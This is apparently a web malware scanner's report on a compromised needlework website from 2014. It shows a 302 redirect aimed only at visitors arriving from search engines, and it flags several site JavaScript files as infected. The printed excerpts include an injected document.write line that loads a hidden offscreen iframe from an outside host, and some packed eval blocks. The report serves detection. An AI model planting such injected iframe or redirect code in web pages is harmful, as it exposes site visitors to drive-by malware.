Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://needlework-collection.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: needlework-collection.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 24 Sep 2014 09:21:35 GMT Location: http://site.portrelay.com/ Server: Jino.ru/mod_pizza Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://needlework-collection.ru/ | 200 OK Content-Length: 46398 Content-Type: text/html | clean |
http://needlework-collection.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 27336 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JCommentsEvents(){}
function JCommentsInput(){} function JCommentsIndicator(){this.init();} function JCommentsForm(id,editor){this.init(id,editor);} function JCommentsEditor(textarea,resizable){this.init(textarea,resizable);} function JComments(oi,og,r){this.init(oi,og,r);} JCommentsEvents.prototype = { add: function(o,e,f){if(o.addEventListener){o.addEventListener(e,f,false);return true;}else if(o.attachEvent){var r=o.attachEvent("on"+e,f);retu updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} };;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://icimhqiyi.dns-stuff.com/a8e8.w5bYP?13" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://needlework-collection.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 4135 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!window.jtajax) { function jtAJAX() { this.options = {url: '',type: 'post',nocache: true,data: ''}; this.$ = function(id) {if(!id){return null;}var o=document.getElementById(id);if(!o&&document.all){o=document.all[id];}return o;}; this.extend = function(o, e){for(var k in (e||{}))o[k]=e[k];return o;}; this.encode = function(t){return encodeURIComponent(t);}; this.setup = function(options) {this.options = this.extend(this.options, options);}; this default: this.error('Unknown command: ' + cmd);break; } } delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; }; this.error = function(){}; } var jtajax = new jtAJAX(); };document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://icimhqiyi.dns-stuff.com/a8e8.w5bYP?13" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://needlework-collection.ru/media/system/js/caption.js | 200 OK Content-Length: 1878 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://icimhqiyi.dns-stuff.com/a8e8.w5bYP?13" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/roktoppanel.js | 200 OK Content-Length: 1334 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J b={H:\'1.0\',3:{\'5\':\'#i-w .5\',\'4\':\'#i-4\',\'q\':\'p\',\'9\':h.G.F.A,\'a\':v,\'6\':1},g:j(){2.3=b.3;2.5=$$(2.3.5)[0];2.4=$$(2.3.4)[0];$(\'d-o\').c(\ Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/mooRainbow.js | 200 OK Content-Length: 14888 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var overlays = [ 'overlay-abstract', 'overlay-bark', 'overlay-blocks', 'overlay-carbon', 'overlay-cracked', 'overlay-crecent', 'overlay-foliage', 'overlay-gatorskin', 'overlay-gradient1', 'overlay-gradient2', 'overlay-hills', 'overlay-hills-trees', 'overlay-mosaic', 'overlay-perforated', 'overlay-spirals', 'overlay-spirals2', 'overlay-stripes-diag', 'overlay-stripes-vert', 'overlay-targets' ]; var themes = new Hash({ "Business Casual": ["overla Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/rokslidestrip.js | 200 OK Content-Length: 3157 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 X=8 1L({1v:\'1.9\',3:{j:\'\',1B:{11:G,1l:1e},M:{11:G,1S:16.1N.1K.1F},A:{7:1u,i:1p},v:G,T:\'1h\',D:1b},1W:6(a,b){2.1R(b);2.J=$(a);2.m=2.J.1J(\'.g-k\');q(!2 Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/rokzoom/rokzoom.js | 200 OK Content-Length: 7001 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('I 1m=f 3w({t:{V:\'p/\',1r:{2i:3h,34:T.2O.2C.3P,1S:U},2l:{1S:U},3v:{2i:3l,1S:U}},3g:9(a){4.2W(a);4.1Z();4.1Y();4.g={Y:4.A.3O(4.t.1r),o:4.o.2w(\'q\',4.t.3H),n:4.n.2w(\'Q\ Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/rokmoomenu.js | 200 OK Content-Length: 2425 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 C=R G({6:{m:1t,7:\'1c\',j:12,l:{h:[\'z\',\'Q\'],F:G.1i}},1f:3(b,c){2.11(c);4(n.q)2.6.j=X;2.w=$(b);2.w.V(\'T\').9(3(a){a.1o({\'1l\':2.M.H(2,a),\'1e\':2.I.H(2,a)} Antivirus reports:
| ||
http://needlework-collection.ru/templates/rt_chromatophore/js/mootools.bgiframe.js | 200 OK Content-Length: 1121 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('9.o({5:v(2){6(L.B){6(!3.r(\'d.5\')){2=2||{};g a=$b(2.4,\'J:z\');c 2.4;g 8=$b(2.f,q);c 2.f;(p 9(\'d\',{\'n\':\'5\',m:0,j:-1,4:a,2:$i({h:-3.7(\'K\').e(),D:-3.7(\'C\').e() Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21412 Content-Type: text/javascript | clean |
http://odnaknopka.ru/ok3.js | 200 OK Content-Length: 2766 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function NewOdnaknopka3() {
this.domain=location.href+'/'; this.domain=this.domain.substr(this.domain.indexOf('://')+3); this.domain=this.domain.substr(0,this.domain.indexOf('/')); this.location=false; this.url=function(system) { var title=encodeURIComponent(document.title); var url=encodeURIComponent(location.href); switch (system) { case 1: return 'http://vkontakte.ru/share.php?url='+url; case 2: return 'http://www.facebook.com/sharer.php?u='+u for (i=0;i<12;i++) { html+='<a href="'+this.url(i+1)+'" onclick="return odnaknopka3.go('+(i+1)+');"><img src="http://odnaknopka.ru/images/blank.gif" width="16" height="16" alt=" #" title="'+titles[i]+'" style="border:0;padding:0;margin:0 4px 0 0;background:url(http://odnaknopka.ru/images/panel.png) no-repeat -270px -'+(i*16)+'px"/></a>'; } document.write(html); } } odnaknopka3=new NewOdnaknopka3(); odnaknopka3.init(); Antivirus reports:
| ||
http://needlework-collection.ru/index.php/biser | 200 OK Content-Length: 31189 Content-Type: text/html | clean |
http://needlework-collection.ru/index.php/ | 200 OK Content-Length: 46420 Content-Type: text/html | clean |
http://needlework-collection.ru/index.php/biser/bijuteriya | 200 OK Content-Length: 28383 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=needlework-collection.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://needlework-collection.ru/
Result: needlework-collection.ru is not infected or malware details are not published yet.
Result: needlework-collection.ru is not infected or malware details are not published yet.